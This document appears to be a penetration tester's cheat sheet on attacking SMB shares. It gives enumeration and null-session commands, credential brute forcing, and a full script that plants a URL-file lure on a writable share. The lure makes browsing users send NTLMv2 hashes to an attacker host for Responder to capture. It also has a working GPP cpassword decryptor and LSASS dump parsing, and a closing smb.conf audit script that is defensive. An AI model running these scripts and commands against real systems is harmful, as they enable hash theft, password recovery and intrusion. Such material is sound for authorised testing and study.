Server Message Block
Footprinting The Service
Nmap
sudo nmap 10.129.14.128 -sV -sC -p139,445

RPCclient
rpcclient -U "" 10.129.14.128

rpcclient -U'%' 10.10.110.17

-U'%'
Explicitly sends an empty username and an empty password.
-N
Suppresses the password prompt; combined with an empty -U this attempts a null session.
srvinfo
Server information.
enumdomains
Enumerate all domains that are deployed in the network.
querydominfo
Provides domain, server, and user information of deployed domains.
netshareenumall
Enumerates all available shares.
netsharegetinfo <share>
Provides information about a specific share.
enumdomusers
Enumerates all domain users.
queryuser <RID>
Provides information about a specific user.
Search For Known SMB Version Vulnerabilities (use the SMB/Samba version reported by nmap -sV)
Check For Shares Using Null Sessions
smbclient -N -L //$ip/
cme smb $ip --shares -u "guest" -p ""
Brute Forcing
cme smb $ip -u users.list -p pws.list --local-auth | grep '[+]'

URL File attacks
Test for URL file attacks on a writable share: create a file called "@somename.url" with the contents below and upload it. When a user browses the share, Explorer fetches the icon from the UNC path in IconFile and authenticates to the attacker's host, so an SMB listener (Responder or impacket's smbserver) captures the NTLMv2 hash. The leading "@" sorts the file to the top of the listing so the icon is requested even in large shares.
[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\EnterAttackerip\%USERNAME%.icon
IconIndex=1
Run Responder to capture hashes
/opt/Responder-3.1.3.0/Responder.py -I tun0
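The whole lure procedure above as one script, added here as an example and not part of the original notes: it writes the .url file with Windows line endings, pushes it to a writable share with smbclient, and leaves Responder to be started on the listening interface. The attacker IP, share path and credentials are placeholders passed on the command line.

```sh
#!/bin/sh
# Added example, not from the original notes: build the @name.url lure and
# push it to a writable share. Attacker IP, share and credentials are
# placeholders supplied on the command line.

# make_url_file ATTACKER_IP OUTFILE
# Explorer resolves IconFile the moment a user lists the folder, so every
# browsing user authenticates (NTLMv2) to the attacker's SMB listener.
# .url files are INI-style text; CRLF endings match what Windows writes.
make_url_file() {
    ip="$1"; out="$2"
    printf '[InternetShortcut]\r\nURL=blah\r\nWorkingDirectory=blah\r\nIconFile=\\\\%s\\%%USERNAME%%.icon\r\nIconIndex=1\r\n' "$ip" > "$out"
}

# upload_lure //TARGET/SHARE USER PASS LOCALFILE
# One "put" via smbclient -c; the remote name gets the leading "@" so it sorts
# first in the listing. Replace -U with -N for a null-session share.
upload_lure() {
    smbclient "$1" -U "$2%$3" -c "put $4 @$(basename "$4")"
}

# Stand-alone use:
#   ./lure.sh run 10.10.14.5 //10.129.14.128/notes guest ''
# then capture on the listening interface:
#   sudo /opt/Responder-3.1.3.0/Responder.py -I tun0
if [ "${1-}" = "run" ]; then
    make_url_file "$2" lure.url
    upload_lure "$3" "$4" "$5" lure.url
fi
```

Check the generated file with `cat -A`: every line must end in `^M$`, and the IconFile line must carry a real UNC path (`\\ip\...`), otherwise Explorer silently ignores the icon and no authentication happens.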
Read / Upload access
Attempt to download and view share contents using valid credential / anonymous login / null session
smbmap -H $ip

smbmap -H $ip -r

smbmap with the -r or -R (recursive) option lets you browse the directories.
smbmap -H 10.129.14.128 --download "notes\note.txt"

smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"

smbmap -u guest -p "" -H $ip -A '.*' -R
Cpassword discovery
Search the SYSVOL share (Group Policy Preferences files such as Groups.xml) for a cpassword attribute. The AES key Group Policy Preferences uses is public, so the value decrypts offline.
gpp-decrypt <cpassword>
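What gpp-decrypt does under the hood, as an added example (not from the original notes and not the gpp-decrypt source): pull every cpassword out of a Groups.xml and decrypt it with openssl using the published key. It assumes openssl, base64 and iconv are installed; the Groups.xml used for the self-check is constructed.

```sh
#!/bin/sh
# Added example, not from the original notes: cpassword extraction and
# decryption with standard tools. Requires openssl, base64 and iconv.

# The AES-256 key Microsoft published in the MS-GPPREF specification. It is
# identical in every domain, which is why any cpassword is recoverable.
GPP_KEY=4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b
GPP_IV=00000000000000000000000000000000

# gpp_decrypt CPASSWORD -> plaintext on stdout
# cpassword is base64 with the "=" padding stripped and the plaintext is
# UTF-16LE, so padding is restored before and the text re-encoded after
# the AES-256-CBC step.
gpp_decrypt() {
    c="$1"
    while [ $(( ${#c} % 4 )) -ne 0 ]; do c="${c}="; done
    printf '%s' "$c" | base64 -d \
        | openssl enc -d -aes-256-cbc -K "$GPP_KEY" -iv "$GPP_IV" \
        | iconv -f UTF-16LE -t UTF-8
}

# gpp_encrypt PLAINTEXT -> cpassword-style string
# Only used to produce test data the same way GPMC would (no padding).
gpp_encrypt() {
    printf '%s' "$1" | iconv -f UTF-8 -t UTF-16LE \
        | openssl enc -aes-256-cbc -K "$GPP_KEY" -iv "$GPP_IV" \
        | base64 | tr -d '=\n'
}

# extract_cpasswords FILE -> one cpassword value per line
extract_cpasswords() {
    grep -o 'cpassword="[^"]*"' "$1" | sed 's/^cpassword="//; s/"$//'
}

# decrypt_all FILE -> one decrypted password per line
decrypt_all() {
    extract_cpasswords "$1" | while IFS= read -r cp; do
        gpp_decrypt "$cp"
        echo
    done
}

# Stand-alone use: ./gpp.sh Groups.xml
if [ -n "${1-}" ]; then decrypt_all "$1"; fi
```

Run it over every Preferences XML you pull from SYSVOL (ScheduledTasks.xml, Services.xml and Drives.xml carry cpassword too, not only Groups.xml); the userName attribute next to each cpassword tells you which account the password belongs to.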
lsass.zip / lsass.dmp
Search shares for lsass.zip or lsass.dmp (a minidump of the LSASS process) and parse it for credentials, keys and tickets. pypykatz expects the .dmp, so unzip the archive first.
pypykatz lsa minidump lsass.dmp
Alternate Data Streams (ADS)
Test for alternate data streams after discovering 0 byte files; inside an smbclient session, allinfo lists the streams attached to a file.
allinfo filename
Check Password Policy
cme smb $ip --pass-pol -u guest -p ""
User Discovery
Check For users using valid credential / anonymous login / null session
cme smb $ip --users -u guest -p ""
cme smb $ip --rid-brute -u guest -p ""
Group discovery
check for groups using valid credential / anonymous login / null session
cme smb $ip --groups -u guest -p ""
Smbclient
Interactively access the smb shares using smbclient
smbclient //$ip/someshare -N
smbclient //$ip/someshare -U 'guest' -N
smbclient //$ip/someshare -U 'validuser%validpass'
(-p is the port in smbclient; the password goes after % in -U or in --password)
Dangerous Settings
browseable = yes
The share is listed when clients enumerate shares (smbclient -L); hidden shares still accept connections by name.
read only = no
Files may be created and modified (same effect as writable = yes).
writable = yes
Users can create and modify files.
guest ok = yes
Clients can connect to the share without a password (mapped to the guest account).
enable privileges = yes
Privileges assigned to specific SIDs are honoured.
create mask = 0777
Permissions applied to newly created files; 0777 makes them world-writable.
directory mask = 0777
Permissions applied to newly created directories; 0777 makes them world-writable.
logon script = script.sh
Script the client runs at user logon, fetched from the netlogon share.
magic script = script.sh
Script the server executes as the connected user when the client closes the file.
magic output = script.out
File in which the magic script's output is stored.
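An audit script for the settings above, added here as an example (not from the original notes and not Samba's own testparm): it parses an smb.conf, resolves each share's effective value against [global] the way smbd does, and prints one finding per dangerous setting. The sample config it writes is constructed, with a weak share ([notes]) next to a hardened one ([backup]).

```sh
#!/bin/sh
# Added example, not from the original notes: flag dangerous smb.conf
# settings per share, inheriting unset values from [global].

# audit_smb_conf FILE -> one finding per line, "share: message"
audit_smb_conf() {
    awk '
    # effective value of key k for share s: share setting, else [global]
    function eff(s, k) {
        if ((s, k) in cfg) return cfg[s, k]
        if (("global", k) in cfg) return cfg["global", k]
        return ""
    }
    /^[ \t]*[#;]/ || /^[ \t]*$/ { next }          # comments, blank lines
    /^[ \t]*\[/ {                                   # [section] header
        sec = $0; gsub(/^[ \t]*\[|\][ \t]*$/, "", sec)
        sec = tolower(sec); order[++n] = sec; next
    }
    index($0, "=") > 0 {                            # key = value
        key = substr($0, 1, index($0, "=") - 1)
        val = substr($0, index($0, "=") + 1)
        gsub(/^[ \t]+|[ \t]+$/, "", key); gsub(/[ \t]+/, " ", key)
        gsub(/^[ \t]+|[ \t]+$/, "", val)
        cfg[sec, tolower(key)] = tolower(val)
    }
    END {
        if (cfg["global", "logon script"] != "")
            print "global: logon script = " cfg["global", "logon script"] " (runs on every user logon)"
        if (cfg["global", "enable privileges"] == "yes")
            print "global: enable privileges = yes (SID privileges honoured)"
        for (i = 1; i <= n; i++) {
            s = order[i]
            if (s == "global") continue
            guest = (eff(s, "guest ok") == "yes" || eff(s, "public") == "yes")
            write = (eff(s, "writable") == "yes" || eff(s, "writeable") == "yes" || eff(s, "read only") == "no")
            if (guest) print s ": guest ok = yes (no password required)"
            if (write) print s ": writable (read only = no / writable = yes)"
            if (guest && write) print s ": HIGH anonymous users can write to this share"
            if (eff(s, "create mask") ~ /^0?777$/) print s ": create mask = 0777 (new files world-writable)"
            if (eff(s, "directory mask") ~ /^0?777$/) print s ": directory mask = 0777 (new directories world-writable)"
            if (eff(s, "magic script") != "") print s ": magic script = " eff(s, "magic script") " (executed server-side on close)"
        }
    }' "$1"
}

# count_findings FILE -> number of findings
count_findings() { audit_smb_conf "$1" | wc -l | tr -d ' '; }

# write_sample_conf OUTFILE: constructed smb.conf, weak [notes] beside
# hardened [backup]. Note [notes] inherits create mask = 0777 from [global].
write_sample_conf() {
    cat > "$1" <<'EOF'
[global]
   workgroup = DEV
   create mask = 0777
   enable privileges = yes

[notes]
   path = /srv/notes
   guest ok = yes
   read only = no
   magic script = script.sh

[backup]
   path = /srv/backup
   browseable = no
   read only = yes
   create mask = 0644
   valid users = @backup-ops
EOF
}

# Stand-alone use: ./smbaudit.sh /etc/samba/smb.conf
if [ -n "${1-}" ]; then audit_smb_conf "$1"; fi
```

Feed it `testparm -s` output rather than the raw file when includes or `config file` directives are in play, since testparm prints the fully resolved configuration.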